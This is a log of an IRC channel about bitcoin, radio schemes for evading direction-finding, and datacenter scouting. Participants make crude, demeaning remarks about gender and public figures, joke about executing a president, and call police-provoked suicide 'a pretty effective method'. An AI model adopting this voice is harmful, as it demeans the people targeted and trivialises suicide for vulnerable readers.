1732864;1509806004;mircea_popescu;i expect when i finally execute whoever's then sitting on the inca throne, they'll print "ex US president dies after MP confrontation" 1732865;1509806071;mircea_popescu;asciilifeform incidentally, notice how it's all males ? how about some fucking gender equality ? where's the "women in police shootings" workgroup ? 1732866;1509806075;asciilifeform;( what whatever reason, convincing police to shoot is a popular suicide method in usaschwitz. rather like it was in orig auschwitz. ) 1732867;1509806166;mircea_popescu;"whatever reason", yes. 1732868;1509806224;asciilifeform;hey it's a pretty effective method -- entire firing squad, 'for free', on call 1732869;1509806276;asciilifeform;( in mega-b00k re 'evil fyoootoor' , 'stand on zanzibar', this process becomes a proper service, for which they charge, and you can get not only firing squad but whatever you like, burning at the stake, guillotine, etc. ) 1732870;1509806440;asciilifeform;incidentally phunphakt re usa : it is virtually never usg.proper that hunts for radio pirates 1732871;1509806477;asciilifeform;it is normally the crown-licensed user of the 'trespassed' spectrum, who rats him out. in almost all cases on the public record -- 'licensed amateurs' 1732872;1509806529;asciilifeform;they'll work for phree, for weeks, charging usg 0, to find the vreditel' 1732873;1509806634;mircea_popescu;aha. sort-of like "moderators" on usg walled gardens 1732874;1509806639;asciilifeform;exactly like 1732875;1509806649;asciilifeform;to this day i puzzle over what is the appeal of 'licensed amateur radio' 1732876;1509806666;mircea_popescu;cuckolds, dood. 1732877;1509806669;asciilifeform;as i currently understand, it is a kind of primitive voice-powered usenet group, with the diff that you can get gestapo to pick up spammers 1732878;1509806703;asciilifeform;there is also quite a bit of fixation, among the aficionados, on the physical process of building the radios, stringing antennae through treetops, and other minutiae. 1732879;1509806706;mircea_popescu;dja recall i mocked at some point, i dun recall if here or on trilema, this wikipedia tard who posted something like "oh, i'm trying to help by being an officious intermeddler on this here admin board, until someone tells me to stop" ? 1732880;1509806720;asciilifeform;exactly like the 'cypherpunks' as described by phf in old thread 1732881;1509806735;mircea_popescu;many many years ago. but the item is exactly descriptive. one day, white petrus shows up at so and so office, starts picking up the trash and acting as if he works there for visitors. 1732882;1509806736;asciilifeform;( incidentally the other day asciilifeform finally met phf in meatland ) 1732883;1509806744;mircea_popescu;who knows, maybe this turns into a job ? if he gets ensconced neough ? 1732884;1509806763;asciilifeform;lol! 1732885;1509806766;asciilifeform;was this the fetlife thing 1732886;1509806766;mircea_popescu;asciilifeform actually, exactly like kanzure and friends. they've nothing to do with the topic they discuss, but they do enjoy the attention from you know, "authority". 1732887;1509806789;mircea_popescu;so... nsa wants to keep in touch with the whatever community, and idle tards of ~same value as a pig their size want to be kept in touch with. 1732888;1509806802;mircea_popescu;out of their happy interaction, a whole alt-world of no impact and no importance. 1732889;1509806811;mircea_popescu;asciilifeform nah, some wikipedia bureaucracy thing. 1732890;1509806824;asciilifeform;between all of this, usg does still enforce its monopoly on long-range telecom. 1732891;1509806862;mircea_popescu;i've never verified this theory. 1732892;1509807015;asciilifeform;i haven't verified that the 3rd rail in the underground is 800 volts hot, yet, either. 1732893;1509807039;mircea_popescu;well, once you finally get triphase installed you may then be surprised. 1732894;1509807057;asciilifeform;orig point being that directionfinder gear makes life unreasonably easy for the enemy 1732895;1509807080;mircea_popescu;enemy is long lost to this life. 1732896;1509807102;mircea_popescu;but that practical consideration aside, obviously nothing wrong with doing things right. 1732897;1509807201;deedbot;http://trilema.com/2017/qntra-sqntr-october-2017-statement/ << Trilema - Qntra (S.QNTR) October 2017 Statement 1732898;1509807570;mircea_popescu;http://btcbase.org/log/2017-11-04#1732882 << o yeah ? what's he up to these days. 1732899;1509807570;a111;Logged on 2017-11-04 14:45 asciilifeform: ( incidentally the other day asciilifeform finally met phf in meatland ) 1732900;1509807946;asciilifeform;i'll let the man speak for himself 1732901;1509807968;asciilifeform;( iirc he was stuck with unpleasant meatspace chores for a long while. ) 1732902;1509808005;mircea_popescu;evidently. 1732903;1509808016;asciilifeform;also met a phriend of his, who asked not to be named, who traded 2 bolix 'ivory' cpus for asciilifeform's 1 bolix-3620 . 1732904;1509808045;mircea_popescu;same ol' disaster of commons. when it comes to it, erryone's got something to do at home. 1732905;1509808153;asciilifeform;oh upstack re radios, the 'why not use aperidic wave, and entire spectrum' thing was of course not long ago hannobockized and redhatized by usg shills, as 'uwb (ultrawideband)' and 'regulated' and other rubbish. 1732906;1509808159;asciilifeform;*aperiodic 1732907;1509808188;asciilifeform;they sit around and 'make rules' for it, same as 'for blockchain laundering' etc. 1732908;1509808200;mircea_popescu;gotta kill the time somehow. 1732909;1509808213;mircea_popescu;romanian expression is "taie frunza la ciini", ie, divide leaves among the dogs. 1732910;1509808506;apeloyee;http://btcbase.org/log/2017-11-04#1732826 << I understood that, and it seems doubtful 1732911;1509808506;a111;Logged on 2017-11-04 14:18 asciilifeform: apeloyee: q was, is it possible to transmit in such a way that for someone without the key, there ~is~ no 'signals received' 1732912;1509808537;apeloyee;if enemy has only one receiver, you can 1732913;1509808717;*;shinohai is now thoroughly depressed after reading October s.qntr statement 1732914;1509808816;mircea_popescu;meanwhile in other reichs, https://pbs.twimg.com/media/DNuc6q4V4AEaDTf.jpg 1732915;1509809041;apeloyee;asciilifeform: in one receiver case, one can detect a narrowband transmission using autocorrelation; in case of "aperiodic" whatever, one can detect a spatially fixed transmitter by measuring correlation between signals of two stations. of course, in practice one would need to use many pairs (or a clever algorithm I cannot now think of), and filter known stations 1732916;1509809408;apeloyee;two stations won't let you recover the signal, of course; just know something's there as soon as it transmitted enough bits (literally!) 1732917;1509809540;apeloyee;*have transmitted 1732918;1509809629;mircea_popescu;apeloyee maybe i'm missing something. how do you distinguish this "something" from "people turned on their electric stoves" say ? 1732919;1509809772;asciilifeform;apeloyee: transmitter does not have to be a point source 1732920;1509809803;asciilifeform;can just as easily be, say, 17 sources geographically dispersed , working in concert 1732921;1509809815;apeloyee;by using stronger signal than the stoves. if you try to be below noise, you would transmit slowly, and thus still not evade max # of bits. 1732922;1509809833;mircea_popescu;apeloyee do you have an idea how loud random events get ? 1732923;1509809902;apeloyee;can just as easily be, say, 17 sources geographically dispersed , working in concert << you would not particuraly need fancy modulations then 1732924;1509809903;mircea_popescu;for instance : the majority of low clouds passing over this here observation point are em-louder than CG-73. 1732925;1509809972;mircea_popescu;(item got reliably measured because in the 90s they were derping about putting a d-fluorine mw laser on it.) 1732926;1509810107;apeloyee;clouds move. otoh if the suspected source keeps transmitting... 1732927;1509810138;apeloyee;I concede I don't have a good estimate as to the amount of information a fixed location's good for 1732928;1509810165;mircea_popescu;all sorts of phenomena intercede. clouds is an example, but the point is that "noise floor" is not JUST a floor, but also randomly distributed perturbations, which during a whole day can reach significant amplitudes. 1732929;1509810193;asciilifeform;apeloyee: what i'd like is http://btcbase.org/log/2017-11-02#1732165 + if you ~do~ somehow detect the fact-of the transmission, it ought to look exactly like the source had wings and zipped randomly around the continent. 1732930;1509810193;a111;Logged on 2017-11-02 19:50 asciilifeform: at any rate drawing a plot like http://www.oliviamode.com/OliviaView.htm should not be possible for proper item. 1732931;1509810209;mircea_popescu;apeloyee take an actually publicly-documented example : most crews tend to turn off the auto-return-fire thingee because left to its own devices it wastes all the ammo. 1732932;1509810220;mircea_popescu;this is a much more reliable sound-detection with satellite support item 1732933;1509810261;mircea_popescu;in general, the only thing a "find me an em shrubbery" produces reliably are false positives. 1732934;1509810457;asciilifeform;incidentally, rf 'fox hunting' is at this point a traditional sport in ru, and the 'fox' is always found . 1732935;1509810468;asciilifeform;it isn't a particularly mysterious process. 1732936;1509810471;apeloyee;it wastes all the ammo.<< if ammo would be cheap they wouldn't. 1732937;1509810473;mircea_popescu;not by purely passive em methods i expect 1732938;1509810477;asciilifeform;passive. 1732939;1509810513;mircea_popescu;apeloyee ammo is always expensive even if free, for a purely ecological reason. you don't want your space too filled with ordnance. 1732940;1509810525;mircea_popescu;that's how friendly fire happens. 1732941;1509810618;mircea_popescu;asciilifeform then i guess foxes use hunter-provided equipment. 1732942;1509810627;apeloyee;if there's truly that many perturbations, they will also make difficult for the intended recipient to receive correctly. 1732943;1509810638;mircea_popescu;i expect so, yes. 1732944;1509810643;asciilifeform;well it's a sport, they use agreed-upon standard item, just like both tennis players get same type of racket, etc 1732945;1509810664;asciilifeform;apeloyee: difficult is ok. so long as for intended man -- possible, for the unintended -- impossible. 1732946;1509810679;mircea_popescu;apeloyee narrowness of band was the original attempt to get out of this. the narrower the band the "better" the reception in the sense of fewer natural perturbations. which is what drove the move to diodes and then ic. 1732947;1509810688;mircea_popescu;(no, ic was not made for ocmputers. ic was made for naval comms.) 1732948;1509810691;asciilifeform;even if it takes, say, a whole minute to move a byte. 1732949;1509810719;mircea_popescu;if you use wide spectrums, you get back to the problem of, "nature has more energy to burn than you do" 1732950;1509810732;apeloyee;if you have more transmitters than enemy has receivers "in the area" (precise meaning is a legit research q), then you can hide from the enemy, otherwise, you will be eventually found. 1732951;1509810750;mircea_popescu;this is an interesting formalization. 1732952;1509810759;asciilifeform;idea is that for the enemy, without the key, you are below noise floor; but for the intended recipient, who knows how to look -- above. 1732953;1509810793;mircea_popescu;apeloyee suppose what is transmitted is an equivalent of the "number stations" of old. minus, of course, the girly voice. 1732954;1509810801;mircea_popescu;if i actually transmit fg output, do you expect you'll ever find ? 1732955;1509810821;asciilifeform;mircea_popescu: depends how transmit. if with carrier -- than trivially found 1732956;1509810828;asciilifeform;( as all existing radios use ) 1732957;1509810857;mircea_popescu;i thought the discussion was carierless 1732958;1509810877;asciilifeform;even without carrier, possible to find. consider usg's adventure in vietnam, where they picked up spark plug noise from trucks on ho chi min trail. 1732959;1509810880;apeloyee;if you use wide spectrums, you get back to the problem of, "nature has more energy to burn than you do" << I'm unsure. Shannon-Hartley thorem sez that at least in its conditions, using as wide spectrum as poosible is optimal. 1732960;1509810888;apeloyee;*theorem 1732961;1509810922;mircea_popescu;apeloyee but this is relevant if you already know there's a signal there 1732962;1509810955;mircea_popescu;ie, it establishes maximum rate, not some kind of "minimum rate of relevancy" 1732963;1509810964;apeloyee;i meant optimal for the sender and his expected recipient, not eavesdropper. 1732964;1509810973;mircea_popescu;ah ah. yes. 1732965;1509810980;mircea_popescu;optimal does mean many surprising things though. 1732966;1509811014;mircea_popescu;also, real noise is not so gaussian, but anyway. 1732967;1509811061;mircea_popescu;(imo the best model of "real noise" in this sense is perusing the SETI reports, or else any major, indiscriminate dataset of radiotelescopy. THAT is how natural noise goes. with the occasional neutron star and the occasional "holy shit" scribbled in pen) 1732968;1509811062;asciilifeform;( admittedly spark plug 'fox hunt' worx great in the otherwise rf-quiet jungle, but would not in a city or anywhere remotely industrialized ) 1732969;1509811114;apeloyee;real noise is not so gaussian << true. but still means must solve the q of optimal bandwidth each time 1732970;1509811126;mircea_popescu;or at least get a decent approximation. 1732971;1509811140;mircea_popescu;the problem with "natural noise" is that there's so many local maxima. 1732972;1509811147;apeloyee;maxima of what? 1732973;1509811151;mircea_popescu;of anything. 1732974;1509811170;mircea_popescu;however you define your function, the principal distinction between gaussian and natural noise is that the former is smooth. 1732975;1509811246;apeloyee;?? 1732976;1509811288;mircea_popescu;yeees ? 1732977;1509811308;asciilifeform;mircea_popescu: unfortunately noise is not a scalar : enemy can distinguish your transmitter from supernovae, strictly from the fact that the latter happen 'in the sky' and the former -- not 1732978;1509811332;mircea_popescu;asciilifeform certainly ; but this would then match my criteria for "not by purely passive em methods" above. 1732979;1509811354;asciilifeform;still passive, he has a triangle of receivers pointing in orthogonal planes. 1732980;1509811399;apeloyee;what's smooth noise? 1732981;1509811426;mircea_popescu;not ~entirely~ passive, he makes some assumptions on the nature of "using hunter-provided equipment" 1732982;1509811473;asciilifeform;whole q, from asciilifeform's pov, is 'what should the fox do, if playing without rules, in battlefield, not in karateka' 1732983;1509811506;asciilifeform;naturally fox will make own, rather than using hunter's, gear. 1732984;1509811530;mircea_popescu;apeloyee let me take the matter this way : are you familiar with how every "be a graphics artist" software package out there has a coinvolve-with-gaussian "effect" ? 1732985;1509811539;mircea_popescu;or for that matter, dja remeber that old "encrypted" penguin logo ? 1732986;1509811551;mircea_popescu;that's smooth noise. \ 1732987;1509811562;asciilifeform;http://btcbase.org/log/2016-12-24#1590007 << subj 1732988;1509811562;a111;Logged on 2016-12-24 01:46 asciilifeform: mircea_popescu: all schemes where the transform is of 'payload itself' and 0 entropy, suffer from immediate 'penguin problem', https://blog.filippo.io/content/images/2015/11/Tux_ecb.jpg . 1732989;1509811581;mircea_popescu;perhaps not the best term for it, as it's metaphorical rather than descriptive. 1732990;1509811833;apeloyee;hm. "nonstationary"? 1732991;1509811885;mircea_popescu;i suppose. though really the problem as far as interests here is this : presented with an "aberration", in natural noise you really can't tell whether relevant ; whereas in gaussian noise you generally can guess. 1732992;1509811918;mircea_popescu;ie, the very substance of the "fox can be found" argument. yes, if he uses sparkplugs you yourself sold him ; yes, if he lives in a space of gaussian noise ; yes if etc. 1732993;1509812039;asciilifeform;'not using hunter's equipment' still requires a meaningful difference to exist. just as in the case described in old trilema, where some illiterate camel fucker reinvented caesar's cipher ( and unsurprisingly exactly as breakable as if caesar were resurrected and using his , because why not , despite 'not issued by hunter') 1732994;1509812050;mircea_popescu;quite, yes. 1732995;1509812070;mircea_popescu;it's not indefensible to suspect juche sparkplugs still fucking sparkplugs. perhaps. 1732996;1509812103;asciilifeform;so subj is really a restatement of asciilifeform's orig q : how does the fox's equip have to differ from the extant. 1732997;1509812121;*;asciilifeform brb, meat 1732998;1509812171;mircea_popescu;anyway, i suppose the correct reference i sohulkd have given re smoothness was weierstrass. 1732999;1509812209;mircea_popescu;yes it's true that heat in a rod, or whatever diffusion phenomena are relatively smooth in this sense ; nevertheless em is the least smooth of the entire series. 1733000;1509812280;mircea_popescu;gaussian is a decent "middle of the way" representation ; but not so useful when discussing specifically stuff to the extreme one side. 1733001;1509813605;mircea_popescu;in entirely unrelated lulz : the "womenz in tech" dynastry of aparatchicks over at wikipedia is pretty lulzi : sue gardner's lengthy tenure ended (she was recycled to nsa honeypot "tor project") to be replaced by lila tretikov, two bit russki scammer gal who got sent off (over the whole "knowledge engine" failed wikimedia http://btcbase.org/log/2017-10-26#1729324 attempt) to be replaced by katherine maher. 1733002;1509813605;a111;Logged on 2017-10-26 16:59 mircea_popescu: anyway, back to the bait and switch thing. reddit started life as a sort of 4chan with a jump, ie the little girl's not on the page, but you have to click. this wasn't accidental, because their phase 2 ("growth phase" eh) consisted of the exact value proposition : add your crap to reddit, watch people click on it. once growth stopped they dropped the bait, switched to "we will control the conversation in this ever-so-importan 1733003;1509813615;mircea_popescu;https://en.wikipedia.org/wiki/File:Group_photo_of_Wikimedians_Meetup_With_Katherine_Maher_-_WikiConference_India_-CGC_-IMG_5330.jpg << meanwhile wikipedia ever more relevant. in india. 1733004;1509815445;shinohai;What's that a picture of, a fivver developer's meetup? 1733005;1509815804;mircea_popescu;hey, outsourcing goes the way it goes. 1733006;1509818329;asciilifeform;re: cryptoradio, here's a gedankenexperiment: consider a tx station consisting of 2 separated (by, say, a km+ of cable) transmitters; each sends prng soup across a few 100MHz . modulation of payload is strictly via altering their relative ~amplitudes~ . 1733007;1509818408;asciilifeform;receiver needs to know 1) prng seed for each 2) the band 3) his physical position relative to the prongs of the station 1733008;1509818527;asciilifeform;the prongs thing is quite like the xor-otp structure removal transform from the ciphers thread 1733009;1509818538;asciilifeform;i.e. individually the signals are meaningless 1733010;1509819389;asciilifeform;( and can just as easily substitute ~actual~ otp in place of the prng, if you like , the exact mechanics of generating the noise waveform are irrelevant other than for the fact that they must be repeatable ) 1733011;1509819514;asciilifeform;thereby scheme reduces to looking for a truly rngistic signal that at all times is known ~in advance~, but from 2 or more diverging physical directions; and comparing. 1733012;1509820108;apeloyee;why 2 instead of 1 of maxint? 1733013;1509820113;apeloyee;*or maxint 1733014;1509820637;asciilifeform;for same reason you an' i, have 2 eyes 1733015;1509820640;asciilifeform;and not 3, and not maxint. 1733016;1509820662;asciilifeform;3rd, 4th, ... dun help any. 1733017;1509820709;asciilifeform;1 reduces to convention radio, where the signal carries meaning. 1733018;1509820715;asciilifeform;*conventional 1733019;1509820726;mircea_popescu;just about the item i thought was under discussion all along. 1733020;1509820797;asciilifeform;what i suspect you get, is something quite like the ultralongwave submarine transmitter, but without the monstrous mains current bills. 1733021;1509820860;asciilifeform;( observe that 'fox hunting' for ulw is ~impractical, not only from sheer physical dimensions of the receiver , but from signal strength being approx same on entire planet, regardless of where you tx from ) 1733022;1509821083;mircea_popescu;meanwhile in "tasteful" jale, http://78.media.tumblr.com/e7b8852c794718f5d329647c304c8abc/tumblr_nlms8dkUc61s9x1ugo1_1280.jpg 1733023;1509822363;mircea_popescu;in other fiat-octopus-withdrawing-from-salt news, https://forum.fiverr.com/t/payment-in-bitcoin/100989 << fiverr discontinues bitcoin payments. 1733024;1509823013;BingoBoingo;Oh my! 1733025;1509823744;danielpbarron;!~later tell BingoBoingo i don't think your wotpaste url was correct. can you resend? 1733026;1509823744;jhvh1;danielpbarron: The operation succeeded. 1733027;1509823756;BingoBoingo;danielpbarron sure 1733028;1509823923;BingoBoingo;!~later tell danielpbarron http://wotpaste.cascadianhacker.com/pastes/uouBc/?raw=true 1733029;1509823923;jhvh1;BingoBoingo: The operation succeeded. 1733030;1509824625;danielpbarron;got it, ty. 1733031;1509826510;BingoBoingo;yw 1733032;1509827957;shinohai;I simply must have this table: http://btcinfo.sdf.org/uploads/castletable.jpg 1733033;1509829570;ben_vulpes;adventures in remedial binary arithmetic continue... http://p.bvulpes.com/pastes/eYcqJ/?raw=true 1733034;1509832234;shinohai;blockchain.info on the phork: "To ensure they remain safe while the network is in transition, we will temporarily suspend bitcoin send, request, buy, sell, and exchange functionality roughly 12 to 24 hours before the time of the fork until the network stabilizes. " 1733035;1509837085;danielpbarron;!!invoice diana_coman 1 http://logs.minigame.bz/2017-11-04.log.html#t22:09:48 1733036;1509837086;lobbesbot;Logged on 2017-11-04 22:09:48: danielpbarron, 1 bitcoin please 1733037;1509837088;deedbot;Get your OTP: http://p.bvulpes.com/pastes/PWVP1/?raw=true 1733038;1509837230;danielpbarron;!!v 1CD857A9782D80AA761F36ED949321E599419CF46288092E4A01A6EF47DE4DA3 1733039;1509837233;deedbot;Invoiced diana_coman 1 << http://logs.minigame.bz/2017-11-04.log.html#t22:09:48 1733040;1509837234;lobbesbot;Logged on 2017-11-04 22:09:48: danielpbarron, 1 bitcoin please 1733041;1509839007;mircea_popescu;http://btcbase.org/log/2017-11-04#1733040 << check this shit out 1733042;1509839007;a111;Logged on 2017-11-04 23:13 lobbesbot: Logged on 2017-11-04 22:09:48: danielpbarron, 1 bitcoin please 1733043;1509839111;shinohai;Nice 1733044;1509842501;mod6;ya 1733045;1509842831;mod6;qy 1733046;1509842847;mod6;oops ^ 1733047;1509843055;deedbot;http://trinque.org/2017/11/04/deedbo-key-export/ << trinque - Deedbot Key Export 1733048;1509843081;trinque;mod6: there ya go ^ 1733049;1509843088;trinque;ah fuck! typo 1733050;1509843174;deedbot;http://trinque.org/2017/11/04/deedbot-key-export/ << trinque - Deedbot Key Export 1733051;1509843185;trinque;:p 1733052;1509843979;mod6;heeey, thanks :] 1733053;1509843980;*;mod6 grabs 1733054;1509844271;BingoBoingo;tyvm trinque 1733055;1509845910;BingoBoingo;In other press fotos http://www.datacenterguatemala.com/datacentro.html 1733056;1509846637;mod6;lol 1733057;1509846713;shinohai;Is it sad that *my* home setup looks more sophisticated than that? 1733058;1509846781;shinohai;Not that I have that # of boxes, but overall feel 1733059;1509846981;shinohai;Hmmmm ..... Q3,516.00 ? 1733060;1509846988;shinohai;*quetzales 1733061;1509847609;mod6;looks like a ghetto radio shack 1733062;1509861554;deedbot;http://www.thedrinkingrecord.com/2017/11/04/the-boingo-isp-draft-charter/ << Bingo Blog - The Boingo ISP Draft Charter 1733063;1509861640;BingoBoingo;^ Please comment here or there 1733064;1509867654;BingoBoingo;!~ticker --market all 1733065;1509867668;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7415.0, vol: 8221.22501095 | Bitfinex BTCUSD last: 7409.9, vol: 42491.46463617 | Kraken BTCUSD last: 7419.0, vol: 2295.3450999 | Volume-weighted last average: 7411.08502578 1733066;1509867838;BingoBoingo;The crashing continues 1733067;1509867866;BingoBoingo;And physical plant work has transition to more softical plant condensation 1733068;1509870055;diana_coman;!!received-invoices 1733069;1509870060;deedbot;http://p.bvulpes.com/pastes/pO2Jr/?raw=true 1733070;1509870130;diana_coman;!!pay-invoice danielpbarron 1 1733071;1509870133;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Jg8jV/?raw=true 1733072;1509870160;diana_coman;!!v 9F4A7AD7EE5A608457DC1E6627CBA86404991AA27F438FD2BE00994E026CAB8A 1733073;1509870164;deedbot;diana_coman paid danielpbarron invoice 1 1733074;1509870177;diana_coman;!!balance 1733075;1509870180;deedbot;http://p.bvulpes.com/pastes/Awtdp/?raw=true 1733076;1509889578;mircea_popescu;aaand my clioent crashed 1733077;1509889580;mircea_popescu;god damn it 1733078;1509889698;mircea_popescu;oops lol 1733079;1509890598;asciilifeform;in other lulzies, https://archive.is/pb0ZM 1733080;1509890613;asciilifeform;hybrid of bulldog and rhinoceros, verily 1733081;1509890734;asciilifeform;( something like ye old 'leah' but steals half-chewed tmsrisms to grease the implement ) 1733082;1509890963;mircea_popescu;why does erica look like a boy 1733083;1509890973;shinohai;"It bypassed SELinux!" <<<< lmfao 1733084;1509891024;asciilifeform;mircea_popescu: for the obvious reason 1733085;1509891038;mircea_popescu;well, whatever he has to say is thereby disqualified 1733086;1509891056;mircea_popescu;not enough sense to handle own gender, not enough sense to contribute to public conversation. 1733087;1509891089;asciilifeform;entomologists only. 1733088;1509892764;mircea_popescu;in other entomology weird, https://via.hypothes.is/https://sfconservancy.org/blog/2017/nov/03/sflc-legal-action/ 1733089;1509893100;mircea_popescu;and in other http://btcbase.org/log/2017-10-06#1721620 lulz : apparently there's a polyamory community on freenode. 1733090;1509893100;a111;Logged on 2017-10-06 11:40 Framedragger: hello! reporting alive status. went for extended travels through portugal and the likes, moved into apartment in homeland, managing whole new (to me) world of poly relationships, and other fun stuff. 1733091;1509893108;mircea_popescu;brace yourselves for this : #reddit-poly 1733092;1509893127;mircea_popescu;apparently the redditards are taking very seriously their "become the hot topic of the 2010s" mission. 1733093;1509893333;asciilifeform;http://btcbase.org/log/2017-11-05#1733088 << try as i might , i cannot tell who , if anyone, is the ant, and who , if anyone - the anteater 1733094;1509893333;a111;Logged on 2017-11-05 14:39 mircea_popescu: in other entomology weird, https://via.hypothes.is/https://sfconservancy.org/blog/2017/nov/03/sflc-legal-action/ 1733095;1509893343;mircea_popescu;ikr! 1733096;1509893353;mircea_popescu;this is quality entomologist fodder! 1733097;1509893377;asciilifeform;the derps are literally indistinguishable to asciilifeform's unarmed eye 1733098;1509893400;asciilifeform;i haven't even heard of either party prior. 1733099;1509893433;mircea_popescu;two buttfinexes butt-finessing each other. 1733100;1509905607;shinohai;!~ticker --market all 1733101;1509905613;jhvh1;shinohai: Bitstamp BTCUSD last: 7540.0, vol: 8323.27726028 | Bitfinex BTCUSD last: 7534.1, vol: 42455.99189238 | Kraken BTCUSD last: 7538.2, vol: 2481.12859396 | Volume-weighted last average: 7535.21302141 1733102;1509906068;mircea_popescu;onoes 1733103;1509906144;mircea_popescu;and in other buttxplorations, http://78.media.tumblr.com/cbd7c36f2107fceb0fb7b4836273b3d2/tumblr_nl272gQp741sfhnpeo1_1280.jpg 1733104;1509906212;mod6;nice 1733105;1509906755;shinohai;hai mod6 1733106;1509906796;mod6;hola 1733107;1509906824;jurov;trinque: mime-types are fine, but if you could please convert all absolute paths to relative, it would be swell 1733108;1509906870;jurov;namely: 492667 bundle links and the stylesheet 1733109;1509906899;jurov;it appears wget links conversion is total mess and even works differently between versions 1733110;1509907164;mircea_popescu;you mean relative to absolute ? 1733111;1509907191;jurov;"/bundle-492667.txt" is an absolute path and we need just "bundle-492667.txt" 1733112;1509908418;trinque;why exactly? 1733113;1509908451;trinque;how'd it be converting the URL? absolute path is absolute 1733114;1509908468;trinque;(totally could change links, just want to hear why) 1733115;1509909108;jurov;because the mirror does not live at root path 1733116;1509909126;jurov;or you say i must make own subdomain to host it? 1733117;1509909289;jurov;also, with only relative links, one can use the mirror as local files without any changes 1733118;1509909360;jurov;Lastly, as an appeal to any trace of ocd present, links to individual deeds are relative already, and i don't see why the difference. 1733119;1509909992;trinque;didn't say anything other than I don't do anything without a reason 1733120;1509909994;trinque;can change the links, sure 1733121;1509910085;jurov;and you consider the reasons above sufficient? 1733122;1509910153;trinque;sure 1733123;1509911415;trinque;jurov: there ya are, relative links for bundles 1733124;1509916956;deedbot;http://trilema.com/2017/entomologykos-a-kinda-pseudokynegetikos-it-all-comes-from-ticos/ << Trilema - Entomologykos, a kinda Pseudokynegetikos. It all comes from *ticos. 1733125;1509918160;mircea_popescu;http://btcbase.org/log/2017-11-05#1733062 << dood, nevermind charters and bs. a) you still haven't published ~a report~. and it's the 5th. b) http://btcbase.org/log/2017-05-03#1651459 ! and http://btcbase.org/log/2017-09-14#1714557 !! 1733126;1509918160;a111;Logged on 2017-11-05 05:59 deedbot: http://www.thedrinkingrecord.com/2017/11/04/the-boingo-isp-draft-charter/ << Bingo Blog - The Boingo ISP Draft Charter 1733127;1509918160;a111;Logged on 2017-05-03 20:04 mircea_popescu: dude, just call. nevermind the "questions" and rest of the crap. spend 1/10 of the time you frittered away already "on" this to call, write up your report, "i, pete d, aspiring to one day lordship, spent 8 hours today cold calling. i managed a total of 76 calls, which would get me fired from the average call center but hey, i'm new. these 76 calls went to so and so, here's the script, here's why i ammended it and when, here's 1733128;1509918160;a111;Logged on 2017-09-14 23:43 mircea_popescu: asciilifeform why do you imagine shit that's dumb when pete_dushenski does it is any less dumb whewn you do it ? 1733129;1509918179;mircea_popescu;reports are to the past, and are definite. they are not concerned with either the future or "possibilities" 1733130;1509921950;BingoBoingo;Will write 1733131;1509922281;deedbot;http://trilema.com/2017/no-such-labs-snsa-october-2017-statement/ << Trilema - No Such lAbs (S.NSA), October 2017 Statement 1733132;1509923460;deedbot;http://thewhet.net/2017/11/beachcombing-a-guide/ << The Whet - Beachcombing, A Guide 1733133;1509923936;asciilifeform;in other lulz, the french apparently did almost think of http://btcbase.org/log/2017-11-04#1733006 a while back, but 'additional signal to help receive normal one' snore, https://hal.archives-ouvertes.fr/hal-01489004/document ( sorry, pdfola ) 1733134;1509923936;a111;Logged on 2017-11-04 17:58 asciilifeform: re: cryptoradio, here's a gedankenexperiment: consider a tx station consisting of 2 separated (by, say, a km+ of cable) transmitters; each sends prng soup across a few 100MHz . modulation of payload is strictly via altering their relative ~amplitudes~ . 1733135;1509923978;asciilifeform;'First Demonstration and Visualization of Receive Spatial Modulation Using the “Radio Wave Display”' march 2017 1733136;1509924076;asciilifeform;nobody, afaik, tried using ~only~ spatial. 1733137;1509924089;asciilifeform;Because It Would Be Wrong etc. 1733138;1509924115;mircea_popescu;people have a lot of trouble thinking of anything. 1733139;1509925772;asciilifeform;imho it is a quite obvious idea. but the above is the closest asciilifeform found to any record of it having been attempted. 1733140;1509925981;asciilifeform;https://spatmodulation.cms.orange-labs.fr << authors. 1733141;1509926060;asciilifeform;and wtf, fryingpan sized spatial range, wai wai 1733142;1509926072;asciilifeform;should be km+ 1733143;1509926406;deedbot;http://www.thedrinkingrecord.com/2017/11/05/tbi-october-2017-report/ << Bingo Blog - TBI October 2017 Report 1733144;1509926426;BingoBoingo;!!deed http://wotpaste.cascadianhacker.com/pastes/HIMhe/?raw=true 1733145;1509926430;deedbot;accepted: 1 1733146;1509933230;mircea_popescu;and in other presentation suggestions, homemade pate on homemade bread with chilera de jalapenos and/or pickles. followed by a nice cigar with a rum. 1733147;1509933939;hanbot;hey nice report BingoBoingo. what sorta percentage of the 56 dcs contacted wrote back at all, for the curious? 1733148;1509935823;BingoBoingo;hanbot At first 1/8, lately ~60% 1733149;1509935869;BingoBoingo;Peru's a no go. Only independent "datacenters" advertising as such there aren't in the colo business. They are in the Pinoy spam for Espanol speakers business 1733150;1509935896;BingoBoingo;Tomorrow cold calling Uruguay, then Colombia 1733151;1509935911;hanbot;aha. sixty's pretty shitty, but relative to other service industries not so bad... 1733152;1509935935;hanbot;well, service services, what industry, heh. 1733153;1509935997;mircea_popescu;whjat happened to teh brazil prospect ? sounded reasonable enough ? 1733154;1509936205;BingoBoingo;It's still there, but they timeline to make a business there is months out so I am still slutting it up and looking for faster sexier prospects where something might be able to turn on by Thanksgiving 1733155;1509936286;BingoBoingo;The cost of doing anything in Brazil without already being established in a Mercosur jurisdiction also keeps adding up. 1733156;1509936425;BingoBoingo;Still trying to move forward on Brazil, but gotta keep the parallelism up in the search lest locking issues screw the whole thing until next year. 1733157;1509936561;*;asciilifeform prepares for... second expedition 1733158;1509936579;BingoBoingo;In further digging looking at public undersea cable maps, Montevideo is apparently a popular destination for "disaster recovery" infrastructure. 1733159;1509936642;BingoBoingo;Colombia also has substantial cable coming in from across the Caribean and through the Isthmus 1733160;1509936863;BingoBoingo;asciilifeform: Good luck, may your Rotaku lang write head grow strong 1733161;1509937265;mircea_popescu;BingoBoingo srsly, takes months to reg a corp in brazil ?! 1733162;1509937274;mircea_popescu;how about panama or w/e ? 1733163;1509937306;mircea_popescu;and yes montevideo is reasonably strong 1733164;1509937309;BingoBoingo;mircea_popescu: One month to reg corp in Brazil, more to bring corp online once corp'd 1733165;1509937335;mircea_popescu;in juristidctions where that is the case, saner lawyers have pre-regd corps ready to be sold. 1733166;1509937341;BingoBoingo;Panama also getting second deeper comb. First pass on Panama showed a lot of equinix 1733167;1509937343;mircea_popescu;maybe should ask for that ? 1733168;1509937435;BingoBoingo;Hopefully that is the route fellipelali's contacts will lead, but substantial due diligence required. A lot of pre-regd corps in Brazil are loaded with debt. 